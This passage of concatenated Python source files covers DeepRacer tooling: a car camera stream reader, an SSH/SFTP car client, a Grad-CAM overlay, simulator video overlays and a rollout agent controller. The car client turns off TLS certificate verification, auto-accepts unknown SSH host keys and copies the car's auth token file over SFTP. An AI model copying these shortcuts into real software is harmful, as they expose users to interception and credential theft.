def unsubscribe(self, consumer: StreamConsumer):
if consumer in self.consumers:
self.consumers.remove(consumer)
@property
def fps(self):
raise NotImplementedError
@property
def width(self):
raise NotImplementedError
@property
def height(self):
raise NotImplementedError
class DeepRacerMJPEGStream(BaseStream):
def __init__(
self, car: DeepRacerCar, width=480, height=360, quality=90, min_fps=10.0
):
super().__init__()
self.car = car
self.videoThread = threading.Thread(target=self.process_frames)
self.videoThread.daemon = True
self.video_url = car.camera_feed(width=width, height=height, quality=quality)
self.video_width = width
self.video_height = height
if quality <= 0 or quality > 100:
raise ValueError("Video quality should be in range [1, 100]")
self.quality = quality # Minimum quality of the video stream, lower will use less data at the cost of lower video quality.
self.min_fps = min_fps # Minimum FPS required for broadcasting, if approx fps too low the stream will disconnect.
self.framerate = None # Stores current framerate approximation.
def start(self):
self.videoThread.start()
logging.debug("Starting streaming thread for stream {}".format(self.identifier))
def process_frames(self):
while True:
try:
logging.info(
"Attempting to connect to stream {}".format(self.identifier)
)
if not self.car.connected:
logging.info(
"Car '{}' not connected for input stream {}".format(
self.car.name, self.identifier
)
)
continue
bytebuffer = bytes()
response = self.car.session.get(self.video_url, stream=True, timeout=6)
response.raise_for_status()
chunk_size = 10 * 1024 * 1024
start_frame = time.time()
framerate_counter = 0
for chunk in response.iter_content(chunk_size=chunk_size):
bytebuffer += chunk
a = bytebuffer.find(b"\xff\xd8")
b = bytebuffer.find(b"\xff\xd9")
if a != -1 and b != -1:
framerate_counter += 1
frame_time = time.time()
jpg = bytebuffer[a : b + 2]
bytebuffer = bytebuffer[b + 2 :]
frame = cv2.imdecode(
np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_COLOR
)
# Car will start "enqueing" frames if it cannot send them fast enough causing huge delays on the stream after a period of bad connection.
# Workaround: monitor framerate, if it drops try to reconnect.
if (frame_time - start_frame) > 1:
self.framerate = framerate_counter / (
frame_time - start_frame
)
framerate_counter = 0
start_frame = frame_time
logging.debug("FPS: {}".format(self.framerate))
# If no approximate framerate yet, don't broadcast the frames to prevent lag when low framerate occurs.
if self.framerate is None:
continue
elif self.framerate < self.min_fps:
logging.debug(
"Stopping because of low framerate: {}".format(
self.framerate
)
)
self.framerate = None
break
self.publish_frame(frame)
except Exception as e:
logging.debug(e)
pass
finally:
retry_rate = 5
logging.debug(
"Finish stream for {}, retry in {} seconds...".format(
self.identifier, retry_rate
)
)
# Notify no frame is sent.
self.publish_frame(None)
# On failure try to reconnect to stream every 5 seconds.
time.sleep(retry_rate)
@property
def width(self):
return self.video_width
@property
def height(self):
return self.video_height
```
#### File: dct/util/silverstone.py
```python
import requests
import tempfile
import shutil
import pysftp
import os
import threading
import time
import re
import logging
import paramiko
from urllib3.connection import ConnectTimeoutError
from dct.util.model import ModelMetadata, Model
class DeepRacerCar:
def __init__(self, ip, ssh_password=<PASSWORD>, name="Car", verbose=False):
self.ip = ip
self.ssh_password = <PASSWORD>
self.base_url = "https://{}".format(ip)
self.name = name
self.carThread = threading.Thread(target=self.monitor)
self.carThread.daemon = True
self.logThread = threading.Thread(target=self.roslog)
self.logThread.daemon = True
self.tmpdir = tempfile.mkdtemp()
self.session = requests.Session()
self.session.verify = False
self.connected = False
self.model_name = None
self.throttle = None
self.car_driving = None
self.battery_level = None
self.camera_status = None
self.stereo_status = None
self.lidar_status = None
self.verbose = verbose
def __del__(self):
if os.path.exists(self.tmpdir):
shutil.rmtree(self.tmpdir)
def roslog(self):
while True:
try:
with paramiko.SSHClient() as client:
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
self.ip, 22, "deepracer", self.ssh_password, timeout=2
)
stdin, stdout, stderr = client.exec_command(
"source /opt/ros/kinetic/setup.bash; rostopic echo /rosout_agg/msg",
)
for line in iter(lambda: stdout.readline(2048), ""):
self._update_log_values(line)
except Exception as e:
print(e)
finally:
# Retry every 5 seconds.
time.sleep(5)
def monitor(self):
while True:
try:
if not self.connected:
self._connect()
# Update battery level
self._update_battery_level()
# Update sensor info
self._update_sensor_status()
if self.verbose:
print(self)
except Exception as e:
self.connected = False
print(e)
logging.info("Car '{}' disconnected".format(self.name))
finally:
# Update every 10 seconds.
time.sleep(10)
def __str__(self):
return "[{}]: Model: {} - Battery: {} - Driving: {} - Throttle: {}%".format(
self.name,
self.model,
self.battery_level,
self.car_driving,
self.throttle if self.throttle is not None else "?",
)
def connect(self):
self.carThread.start()
self.logThread.start()
def _connect(self):
try:
logging.info("Attempting to connect to {}".format(self.name))
deepracer_token_path = os.path.join(self.tmpdir, "token.txt")
# Use SSH to get the deepracer token from the cookie.
with pysftp.Connection(
self.ip, username="deepracer", password=self.ssh_password
) as sftp:
logging.info("Downloading token for {}".format(self.name))
sftp.get(
"/opt/aws/deepracer/token.txt",
deepracer_token_path,
)
with open(deepracer_token_path, "r") as f:
self.cookie = "deepracer_token={}".format(f.readlines()[0])
self.session.headers["Cookie"] = self.cookie
self.connected = True
logging.info("Car '{}' connected!".format(self.name))
except ConnectTimeoutError:
self.connected = False
logging.info("Timeout connecting to car '{}'".format(self.name))
return
except Exception as e:
logging.debug(e)
def load_model(self, model_name):
logging.info(
"Loading model '{}' from car '{}'' at {}".format(
model_name, self.name, self.ip
)
)
with pysftp.Connection(
self.ip, username="deepracer", password=self.ssh_password
) as sftp:
base_path = os.path.join(self.tmpdir, model_name)
if not os.path.exists(base_path):
os.makedirs(base_path)
model_path = os.path.join(self.tmpdir, model_name, "model.pb")
metadata_path = os.path.join(self.tmpdir, model_name, "model_metadata.json")
if not os.path.exists(model_path):
sftp.get(
"/opt/aws/deepracer/artifacts/{}/model.pb".format(model_name),
model_path,
)
if not os.path.exists(metadata_path):
sftp.get(
"/opt/aws/deepracer/artifacts/{}/model_metadata.json".format(
model_name
),
metadata_path,
)
metadata = ModelMetadata.from_file(metadata_path)
return Model.from_file(model_path, metadata), metadata
def camera_feed(self, width=480, height=360, quality=90, topic="display_mjpeg"):
assert topic in ["display_mjpeg", "overlay_msg"], "Camera topic not supported!"
return "{}/route?topic=/{}&width={}&height={}&quality={}".format(
self.base_url, topic, width, height, quality
)
def _update_battery_level(self):
res = self.session.get(
"{}/api/get_battery_level".format(self.base_url), timeout=20
)
if res.status_code != 200:
raise Exception("Error updating car battery level.")
out = res.json()
if out["success"] is True and self.battery_level != out["battery_level"]:
self.battery_level = out["battery_level"]
logging.info(
"{} battery level changed: {}".format(self.name, self.battery_level)
)
def _update_sensor_status(self):
res = self.session.get(
"{}/api/get_sensor_status".format(self.base_url), timeout=20
)
if res.status_code != 200:
raise Exception("Error updating car sensor status.")
out = res.json()
if out["success"] is True:
if self.camera_status != out["camera_status"]:
self.camera_status = out["camera_status"]
logging.info(
"Car '{}' camera_status changed: {}".format(
self.name, self.camera_status
)
)
if self.stereo_status != out["stereo_status"]:
self.stereo_status = out["stereo_status"]
logging.info(
"Car '{}' stereo_status changed: {}".format(
self.name, self.stereo_status
)
)
if self.lidar_status != out["lidar_status"]:
self.lidar_status = out["lidar_status"]
logging.info(
"Car '{}' lidar_status changed: {}".format(
self.name, self.lidar_status
)
)
def _update_log_values(self, line):
if line == "---\n":
return
line = line.lstrip('"').rstrip('"\n')
# Check if car is running
match = re.search(r"Inference task .* has (.*)", line)
if match:
state = match[1]
car_driving = True if state == "started" else False
if self.car_driving != car_driving:
self.car_driving = car_driving
logging.info(
"Car '{}' driving state changed: {}".format(
self.name, self.car_driving
)
)
return
# Find currently loaded model.
match = re.search(r"Model '(.*)' is installed", line)
if match:
if self.model_name != match[1]:
self.model_name = match[1]
logging.info(
"Car '{}' loaded model changed: {}".format(
self.name, self.model_name
)
)
return
# Find last throttle value.
match = re.search(r"Setting throttle to (\d+\.\d+)", line)
if match:
throttle = float(match[1]) * 100
if self.throttle != throttle:
self.throttle = throttle
logging.info(
"Car '{}' throttle changed: {}".format(self.name, self.throttle)
)
return
```
#### File: dct/visualizations/gradcam.py
```python
import tensorflow as tf
import numpy as np
import cv2
import threading
import time
from dct.util.model import Model
class GradCamOverlay:
def __init__(self, car):
self.car = car
self.gradcamThread = threading.Thread(target=self.monitor_model)
self.gradcamThread.daemon = True
self.active_model_name = None
self.model = None
self.metadata = None
self.cam = None
self.gradcamThread.start()
def placeholder(self, input_frame):
return input_frame
def frame(self, input_frame):
if self.cam is None:
return input_frame
result, frame = self.cam.process(input_frame)
return frame
def monitor_model(self):
while True:
if self.active_model_name != self.car.model_name:
self.cam = None
self.model, self.metadata = self.car.load_model(self.car.model_name)
self.cam = GradCam(self.model)
self.active_model_name = self.car.model_name
time.sleep(0.1)
class GradCam:
def __init__(self, model: Model):
self.model = model
# Extract gradcam logic from model.
self.input_layer = self.model.get_model_input()
self.output_layer = self.model.get_model_output()
self.conv_output = self.model.get_model_convolutional_output()
# Get output for this action
y_c = tf.reduce_sum(
tf.multiply(
self.output_layer,
tf.one_hot(
[tf.argmax(self.output_layer)], self.output_layer.shape[-1]
), # TODO: Argmax selects target action for PPO, also allow manual action idx to be specified.
),
axis=1,
)
# Compute gradients based on last cnn layer
self.target_grads = tf.gradients(y_c, self.conv_output)[0]
def process(self, input):
input_resized = cv2.resize(input, self.model.input_size())
input_preprocessed = cv2.cvtColor(input_resized, cv2.COLOR_BGR2GRAY)
input_frame = np.expand_dims(input_preprocessed, axis=2)
ops = [self.output_layer, self.conv_output, self.target_grads]
feed_dict = {self.input_layer: [input_frame]}
result, out, grads_value = self.model.session.run(ops, feed_dict=feed_dict)
result, out, grads_value = result[0, :], out[0, :], grads_value[0, :, :, :]
weights = np.mean(grads_value, axis=(0, 1))
cam = np.dot(out, weights)
# ReLU (only positive values are of interest)
cam = np.maximum(0, cam)
cam = cam / np.max(cam)
# Scale back to resized input frame dimensions.
input_h, input_w = input_resized.shape[:2]
cam = cv2.resize(cam, (input_w, input_h))
# Blend
cam = cv2.applyColorMap(np.uint8(255 * cam), cv2.COLORMAP_JET)
cam = np.float32(cam) + np.float32(input_resized)
cam = 255 * cam / np.max(cam)
cam = np.uint8(cam)
cam = cv2.cvtColor(cam, cv2.COLOR_BGR2RGB)
# Scale back to original frame dimensions.
input_h, input_w = input.shape[:2]
cam = cv2.resize(cam, (input_w, input_h))
return result, cam
``` |
{
"source": "jochem725/deepracer-simapp",
"score": 3
} |
#### File: dist-packages/mp4_saving/single_agent_image_editing.py
```python
import datetime
import logging
import rospy
import cv2
from sensor_msgs.msg import Image as ROSImg
from markov.log_handler.logger import Logger
from markov.rospy_wrappers import ServiceProxyWrapper
from deepracer_simulation_environment.srv import VideoMetricsSrvRequest, VideoMetricsSrv
from mp4_saving import utils
from mp4_saving.constants import (RaceCarColorToRGB,
IconographicImageSize,
TrackAssetsIconographicPngs, RACE_COMPLETE_Y_OFFSET,
RACE_TYPE_TO_VIDEO_TEXT_MAPPING, XYPixelLoc, AWS_DEEPRACER_WATER_MARK)
from mp4_saving.image_editing_interface import ImageEditingInterface
from mp4_saving.top_view_graphics import TopViewGraphics
LOG = Logger(__name__, logging.INFO).get_logger()
class SingleAgentImageEditing(ImageEditingInterface):
""" Image editing class for head to bot, time-trail, obstacle where
there is only single agent
"""
def __init__(self, racecar_info, race_type):
""" Initializing the required data for the head to bot, time-trail. This is used for single agent
Arguments:
racecars_info (list): list of dict having information of the agent
race_type (str): Since this class is reused for all the different race_type
"""
self.racecar_info = racecar_info
self.race_type = race_type
# Store the font which we will use to write the phase with
self.amazon_ember_regular_20px = utils.get_font('AmazonEmber-Regular', 20)
self.amazon_ember_regular_16px = utils.get_font('AmazonEmber-Regular', 16)
self.amazon_ember_heavy_30px = utils.get_font('AmazonEmber-Heavy', 30)
self.amazon_ember_light_18px = utils.get_font('AmazonEmber-Light', 18)
self.amazon_ember_light_20px = utils.get_font('AmazonEmber-Light', 20)
self.amazon_ember_light_italic_20px = utils.get_font('AmazonEmber-LightItalic', 20)
self.is_racing = rospy.get_param("VIDEO_JOB_TYPE", "") == "RACING"
self.is_league_leaderboard = rospy.get_param("LEADERBOARD_TYPE", "") == "LEAGUE"
self.leaderboard_name = rospy.get_param("LEADERBOARD_NAME", "")
# The track image as iconography
self.track_icongraphy_img = utils.get_track_iconography_image()
gradient_img_path = TrackAssetsIconographicPngs.OBSTACLE_OVERLAY_PNG_LEAGUE_LEADERBOARD.value \
if self.is_league_leaderboard else TrackAssetsIconographicPngs.OBSTACLE_OVERLAY_PNG.value
self.gradient_img = utils.get_image(gradient_img_path,
IconographicImageSize.FULL_IMAGE_SIZE.value)
self.gradient_alpha = self.gradient_img[:, :, 3] / 255.0
# Subscribing to the agent metrics
rospy.wait_for_service("/agent/mp4_video_metrics")
self.mp4_video_metrics_srv = ServiceProxyWrapper("/agent/mp4_video_metrics", VideoMetricsSrv)
# Top camera information
top_camera_info = utils.get_top_camera_info()
self.edited_topview_pub = rospy.Publisher('/deepracer/topview_stream', ROSImg, queue_size=1)
self.top_view_graphics = TopViewGraphics(top_camera_info.horizontal_fov, top_camera_info.padding_pct,
top_camera_info.image_width, top_camera_info.image_height,
racecar_info)
def _edit_major_cv_image(self, major_cv_image):
""" Apply all the editing for the Major 45degree camera image
Args:
major_cv_image (Image): Image straight from the camera
Returns:
Image: Edited main camera image
"""
# Applying gradient to whole major image and then writing text
major_cv_image = utils.apply_gradient(major_cv_image, self.gradient_img, self.gradient_alpha)
mp4_video_metrics_info = self.mp4_video_metrics_srv(VideoMetricsSrvRequest())
# Top left location of the picture
loc_x, loc_y = XYPixelLoc.SINGLE_AGENT_DISPLAY_NAME_LOC.value
# Display name (Racer name/Model name)
display_name = self.racecar_info['display_name']
display_name_txt = display_name if len(display_name) < 15 else "{}...".format(display_name[:15])
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=display_name_txt,
loc=(loc_x, loc_y), font=self.amazon_ember_regular_20px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Lap Counter
loc_y += 30
total_laps = rospy.get_param("NUMBER_OF_TRIALS", 0)
current_lap = int(mp4_video_metrics_info.lap_counter) + 1
lap_counter_text = "{}/{}".format(current_lap, total_laps)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=lap_counter_text,
loc=(loc_x, loc_y), font=self.amazon_ember_heavy_30px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# total_evaluation_time (Race time)
loc_y += 45
total_eval_milli_seconds = mp4_video_metrics_info.total_evaluation_time
time_delta = datetime.timedelta(milliseconds=total_eval_milli_seconds)
total_eval_time_text = "Race | {}".format(utils.milliseconds_to_timeformat(time_delta))
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=total_eval_time_text,
loc=(loc_x, loc_y), font=self.amazon_ember_light_18px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Reset counter
loc_y += 25
reset_counter_text = "Reset | {}".format(mp4_video_metrics_info.reset_counter)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=reset_counter_text,
loc=(loc_x, loc_y), font=self.amazon_ember_light_18px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Speed
loc_x, loc_y = XYPixelLoc.SPEED_EVAL_LOC.value
if self.is_league_leaderboard:
loc_x, loc_y = XYPixelLoc.SPEED_LEADERBOARD_LOC.value
speed_text = "{} m/s".format(utils.get_speed_formatted_str(mp4_video_metrics_info.throttle))
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=speed_text,
loc=(loc_x, loc_y), font=self.amazon_ember_light_20px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Leaderboard name
if self.is_league_leaderboard:
loc_x, loc_y = XYPixelLoc.LEADERBOARD_NAME_LOC.value
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=self.leaderboard_name,
loc=(loc_x, loc_y), font=self.amazon_ember_regular_16px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Evaluation type
loc_x, loc_y = XYPixelLoc.RACE_TYPE_EVAL_LOC.value
if self.is_league_leaderboard:
loc_x, loc_y = XYPixelLoc.RACE_TYPE_RACE_LOC.value
race_text = "race" if self.is_racing else "evaluation"
evaluation_type_txt = "{} {}".format(RACE_TYPE_TO_VIDEO_TEXT_MAPPING[self.race_type], race_text)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=evaluation_type_txt,
loc=(loc_x, loc_y), font=self.amazon_ember_light_italic_20px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# AWS Deepracer logo at the bottom for the community leaderboard
if self.is_league_leaderboard:
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=AWS_DEEPRACER_WATER_MARK,
loc=XYPixelLoc.AWS_DEEPRACER_WATER_MARK_LOC.value,
font=self.amazon_ember_regular_16px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# Check if the done flag is set and set the banner appropriately
if mp4_video_metrics_info.done and (int(total_laps) == current_lap):
# When the cv2 text is written, it automatically drops the alpha value of the image
rel_y_offset = XYPixelLoc.TRACK_IMG_WITH_OFFSET_LOC.value[1] if self.is_league_leaderboard else 0
major_cv_image = cv2.cvtColor(major_cv_image, cv2.COLOR_RGB2RGBA)
racecomplete_image = utils.get_image(TrackAssetsIconographicPngs.RACE_COMPLETE_OVERLAY_PNG.value,
IconographicImageSize.RACE_COMPLETE_IMAGE_SIZE.value)
x_offset = major_cv_image.shape[1] - racecomplete_image.shape[1]//2
y_offset = major_cv_image.shape[0] - RACE_COMPLETE_Y_OFFSET - rel_y_offset - racecomplete_image.shape[0]//2
major_cv_image = utils.plot_rectangular_image_on_main_image(
major_cv_image, racecomplete_image, (x_offset, y_offset))
return major_cv_image
def _edit_minor_cv_image(self):
""" Apply all the editing for the iconographic of the top view camera image
Returns:
Image: Edited image of the iconographic view of the top camera
"""
return self.top_view_graphics.plot_agents_as_circles(self.track_icongraphy_img.copy())
def edit_image(self, major_cv_image):
major_cv_image = self._edit_major_cv_image(major_cv_image)
minor_cv_image = self._edit_minor_cv_image()
offset_loc = XYPixelLoc.TRACK_IMG_WITH_OFFSET_LOC.value if self.is_league_leaderboard \
else XYPixelLoc.TRACK_IMG_WITHOUT_OFFSET_LOC.value
return utils.overlay_track_images(major_cv_image, minor_cv_image, offset_loc)
```
#### File: markov/agent_ctrl/rollout_agent_ctrl.py
```python
import copy
import time
from collections import OrderedDict
import math
import numpy as np
import rospy
import logging
from gazebo_msgs.msg import ModelState
from std_msgs.msg import Float64
from shapely.geometry import Point
from markov.visualizations.reward_distributions import RewardDataPublisher
import markov.agent_ctrl.constants as const
from markov.agent_ctrl.agent_ctrl_interface import AgentCtrlInterface
from markov.agent_ctrl.utils import (set_reward_and_metrics,
send_action, load_action_space, get_speed_factor,
get_normalized_progress, Logger)
from markov.track_geom.constants import (AgentPos, TrackNearDist, ObstacleDimensions)
from markov.track_geom.track_data import FiniteDifference, TrackData
from markov.track_geom.utils import euler_to_quaternion, pose_distance, apply_orientation
from markov.metrics.constants import StepMetrics, EpisodeStatus
from markov.cameras.camera_manager import CameraManager
from markov.common import ObserverInterface
from markov.log_handler.deepracer_exceptions import RewardFunctionError, GenericRolloutException
from markov.reset.constants import AgentPhase, AgentCtrlStatus, AgentInfo
from markov.reset.utils import construct_reset_rules_manager
from markov.track_geom.utils import euler_to_quaternion
from markov.utils import get_racecar_idx
from markov.visual_effects.effects.blink_effect import BlinkEffect
from markov.constants import DEFAULT_PARK_POSITION
from markov.gazebo_tracker.trackers.get_link_state_tracker import GetLinkStateTracker
from markov.gazebo_tracker.trackers.get_model_state_tracker import GetModelStateTracker
from markov.gazebo_tracker.trackers.set_model_state_tracker import SetModelStateTracker
from markov.gazebo_tracker.abs_tracker import AbstractTracker
from markov.gazebo_tracker.constants import TrackerPriority
from rl_coach.core_types import RunPhase
logger = Logger(__name__, logging.INFO).get_logger()
class RolloutCtrl(AgentCtrlInterface, ObserverInterface, AbstractTracker):
'''Concrete class for an agent that drives forward'''
def __init__(self, config_dict, run_phase_sink, metrics):
'''config_dict (dict): containing all the keys in ConfigParams
run_phase_sink (RunPhaseSubject): Sink to receive notification of a change in run phase
metrics (EvalMetrics/TrainingMetrics): Training or evaluation metrics
'''
# reset rules manager
self._metrics = metrics
self._is_continuous = config_dict[const.ConfigParams.IS_CONTINUOUS.value]
self._reset_rules_manager = construct_reset_rules_manager(config_dict)
self._ctrl_status = dict()
self._ctrl_status[AgentCtrlStatus.AGENT_PHASE.value] = AgentPhase.RUN.value
self._config_dict = config_dict
self._done_condition = config_dict.get(const.ConfigParams.DONE_CONDITION.value, any)
self._number_of_resets = config_dict[const.ConfigParams.NUMBER_OF_RESETS.value]
self._off_track_penalty = config_dict[const.ConfigParams.OFF_TRACK_PENALTY.value]
self._collision_penalty = config_dict[const.ConfigParams.COLLISION_PENALTY.value]
self._pause_duration = 0.0
self._reset_count = 0
self._curr_crashed_object_name = ''
# simapp_version speed scale
self._speed_scale_factor_ = get_speed_factor(config_dict[const.ConfigParams.VERSION.value])
# Store the name of the agent used to set agents position on the track
self._agent_name_ = config_dict[const.ConfigParams.AGENT_NAME.value]
# Set start lane. This only support for two agents H2H race
self._agent_idx_ = get_racecar_idx(self._agent_name_)
# Get track data
self._track_data_ = TrackData.get_instance()
if self._agent_idx_ is not None:
self._start_lane_ = self._track_data_.inner_lane \
if self._agent_idx_ % 2 else self._track_data_.outer_lane
else:
self._start_lane_ = self._track_data_.center_line
# Store the name of the links in the agent, this should be const
self._agent_link_name_list_ = config_dict[const.ConfigParams.LINK_NAME_LIST.value]
# Store the reward function
self._reward_ = config_dict[const.ConfigParams.REWARD.value]
# Create publishers for controlling the car
self._velocity_pub_dict_ = OrderedDict()
self._steering_pub_dict_ = OrderedDict()
for topic in config_dict[const.ConfigParams.VELOCITY_LIST.value]:
self._velocity_pub_dict_[topic] = rospy.Publisher(topic, Float64, queue_size=1)
for topic in config_dict[const.ConfigParams.STEERING_LIST.value]:
self._steering_pub_dict_[topic] = rospy.Publisher(topic, Float64, queue_size=1)
#Create default reward parameters
self._reward_params_ = const.RewardParam.make_default_param()
#Create the default metrics dictionary
self._step_metrics_ = StepMetrics.make_default_metric()
# Dictionary of bools indicating starting position behavior
self._start_pos_behavior_ = \
{'change_start' : config_dict[const.ConfigParams.CHANGE_START.value],
'round_robin_advance_dist' : config_dict[const.ConfigParams.ROUND_ROBIN_ADVANCE_DIST.value],
'alternate_dir' : config_dict[const.ConfigParams.ALT_DIR.value]}
# Dictionary to track the previous way points
self._prev_waypoints_ = {'prev_point' : Point(0, 0), 'prev_point_2' : Point(0, 0)}
# Normalized distance of new start line from the original start line of the track.
start_ndist = 0.0
# Normalized start position offset w.r.t to start_ndist, which is the start line of the track.
start_pos_offset = config_dict.get(const.ConfigParams.START_POSITION.value, 0.0)
self._start_line_ndist_offset = start_pos_offset / self._track_data_.get_track_length()
# Dictionary containing some of the data for the agent
# - During the reset call, every value except start_ndist will get wiped out by self._clear_data
# (reset happens prior to every episodes begin)
# - If self._start_line_ndist_offset is not 0 (usually some minus value),
# then initial current_progress suppose to be non-zero (usually some minus value) as progress
# suppose to be based on start_ndist.
# - This will be correctly calculated by first call of utils.compute_current_prog function.
# As prev_progress will be initially 0.0 and physical position is not at start_ndist,
# utils.compute_current_prog will return negative progress if self._start_line_ndist_offset is negative value
# (meaning behind start line) and will return positive progress if self._start_line_ndist_offset is
# positive value (meaning ahead of start line).
self._data_dict_ = {'max_progress': 0.0,
'current_progress': 0.0,
'prev_progress': 0.0,
'steps': 0.0,
'start_ndist': start_ndist,
'prev_car_pose': 0.0}
#Load the action space
self._action_space_, self._json_actions_ = \
load_action_space(config_dict[const.ConfigParams.ACTION_SPACE_PATH.value])
#! TODO evaluate if this is the best way to reset the car
# Adding the reward data publisher
self.reward_data_pub = RewardDataPublisher(self._agent_name_, self._json_actions_)
# subscriber to time to update camera position
self.camera_manager = CameraManager.get_instance()
# True if the agent is in the training phase
self._is_training_ = False
# Register to the phase sink
run_phase_sink.register(self)
# Make sure velocity and angle are set to 0
send_action(self._velocity_pub_dict_, self._steering_pub_dict_, 0.0, 0.0)
# start_dist should be hypothetical start line (start_ndist) plus
# start position offset (start_line_ndist_offset).
start_pose = self._start_lane_.interpolate_pose(
(self._data_dict_['start_ndist'] + self._start_line_ndist_offset) * self._track_data_.get_track_length(),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
self._track_data_.initialize_object(self._agent_name_, start_pose, \
ObstacleDimensions.BOT_CAR_DIMENSION)
self.make_link_points = lambda link_state: Point(link_state.pose.position.x,
link_state.pose.position.y)
self.reference_frames = ['' for _ in self._agent_link_name_list_]
self._pause_car_model_pose = None
self._park_position = DEFAULT_PARK_POSITION
AbstractTracker.__init__(self, TrackerPriority.HIGH)
def update_tracker(self, delta_time, sim_time):
"""
Callback when sim time is updated
Args:
delta_time (float): time diff from last call
sim_time (Clock): simulation time
"""
if self._pause_duration > 0.0:
self._pause_duration -= delta_time
@property
def action_space(self):
return self._action_space_
def reset_agent(self):
'''reset agent by reseting member variables, reset s3 metrics, and reset agent to
starting position at the beginning of each episode
'''
logger.info("Reset agent")
self._clear_data()
self._metrics.reset()
send_action(self._velocity_pub_dict_, self._steering_pub_dict_, 0.0, 0.0)
start_model_state = self._get_car_start_model_state()
# set_model_state and get_model_state is actually occurred asynchronously
# in tracker with simulation clock subscription. So, when the agent is
# entering next step function call, either set_model_state
# or get_model_state may not actually happened and the agent position may be outdated.
# To avoid such case, use blocking to actually update the model position in gazebo
# and GetModelstateTracker to reflect the latest agent position right away when start.
SetModelStateTracker.get_instance().set_model_state(start_model_state, blocking=True)
GetModelStateTracker.get_instance().get_model_state(self._agent_name_, '', blocking=True)
# reset view cameras
self.camera_manager.reset(car_pose=start_model_state.pose,
namespace=self._agent_name_)
self._track_data_.update_object_pose(self._agent_name_, start_model_state.pose)
def _pause_car_model(self, should_reset_camera=False):
'''Pause agent immediately at the current position
'''
car_model_state = ModelState()
car_model_state.model_name = self._agent_name_
car_model_state.pose = self._pause_car_model_pose
car_model_state.twist.linear.x = 0
car_model_state.twist.linear.y = 0
car_model_state.twist.linear.z = 0
car_model_state.twist.angular.x = 0
car_model_state.twist.angular.y = 0
car_model_state.twist.angular.z = 0
SetModelStateTracker.get_instance().set_model_state(car_model_state)
if should_reset_camera:
self.camera_manager.reset(car_pose=car_model_state.pose,
namespace=self._agent_name_)
def _park_car_model(self):
'''Park agent after racer complete F1 race
'''
car_model_state = ModelState()
car_model_state.model_name = self._agent_name_
yaw = 0.0 if self._track_data_.is_ccw else math.pi
orientation = euler_to_quaternion(yaw=yaw)
car_model_state.pose.position.x = self._park_position[0]
car_model_state.pose.position.y = self._park_position[1]
car_model_state.pose.position.z = 0.0
car_model_state.pose.orientation.x = orientation[0]
car_model_state.pose.orientation.y = orientation[1]
car_model_state.pose.orientation.z = orientation[2]
car_model_state.pose.orientation.w = orientation[3]
car_model_state.twist.linear.x = 0
car_model_state.twist.linear.y = 0
car_model_state.twist.linear.z = 0
car_model_state.twist.angular.x = 0
car_model_state.twist.angular.y = 0
car_model_state.twist.angular.z = 0
SetModelStateTracker.get_instance().set_model_state(car_model_state)
self.camera_manager.reset(car_pose=car_model_state.pose,
namespace=self._agent_name_)
def _get_closest_obj(self, start_dist, name_filter=None):
'''get the closest object dist and pose both ahead and behind
Args:
start_dist (float): start distance
name_filter (str): name to filter for the closest object check
Returns:
tuple (float, ModelStates.pose): tuple of closest object distance and closest
object pose
'''
closest_object_dist = None
closest_object_pose = None
closest_obj_gap = const.CLOSEST_OBJ_GAP
for object_name, object_pose in self._track_data_.object_poses.items():
if object_name != self._agent_name_:
if name_filter and name_filter not in object_name:
continue
object_point = Point([object_pose.position.x, object_pose.position.y])
object_dist = self._track_data_.center_line.project(object_point)
abs_object_gap = abs(object_dist - start_dist) % \
self._track_data_.get_track_length()
if abs_object_gap < closest_obj_gap:
closest_obj_gap = abs_object_gap
closest_object_dist = object_dist
closest_object_pose = object_pose
return closest_object_dist, closest_object_pose
def _get_reset_poses(self, dist):
"""
Return center, outer, inner reset position based on given dist
Args:
dist(float): interpolated track dist
Returns: tuple of center, outer, and inner rest positions
"""
# It is extremely important to get the interpolated pose of cur_dist
# using center line first. And then use the center line pose to
# interpolate the inner and outer reset pose.
# If cur_dist is directly used with inner lane and outer lane pose
# interpolation then the result's pose difference from actual reset pose (where it should be)
# is too large.
cur_center_pose = self._track_data_.center_line.interpolate_pose(
dist,
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
inner_reset_pose = self._track_data_.inner_lane.interpolate_pose(
self._track_data_.inner_lane.project(Point(cur_center_pose.position.x,
cur_center_pose.position.y)),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
outer_reset_pose = self._track_data_.outer_lane.interpolate_pose(
self._track_data_.outer_lane.project(Point(cur_center_pose.position.x,
cur_center_pose.position.y)),
finite_difference=FiniteDifference.FORWARD_DIFFERENCE)
return cur_center_pose, inner_reset_pose, outer_reset_pose
def _is_obstacle_inner(self, obstacle_pose):
"""Return whether given object is in inner lane.
Args:
obstacle_pose (Pose): Obstacle pose object
Returns:
bool: True for inner. False otherwise
"""
obstacle_point = Point([obstacle_pose.position.x, obstacle_pose.position.y])
obstacle_nearest_pnts_dict = self._track_data_.get_nearest_points(obstacle_point)
obstacle_nearest_dist_dict = self._track_data_.get_nearest_dist(obstacle_nearest_pnts_dict,
obstacle_point)
return obstacle_nearest_dist_dict[TrackNearDist.NEAR_DIST_IN.value] < \
obstacle_nearest_dist_dict[TrackNearDist.NEAR_DIST_OUT.value]
def _get_car_reset_model_state(self, car_pose):
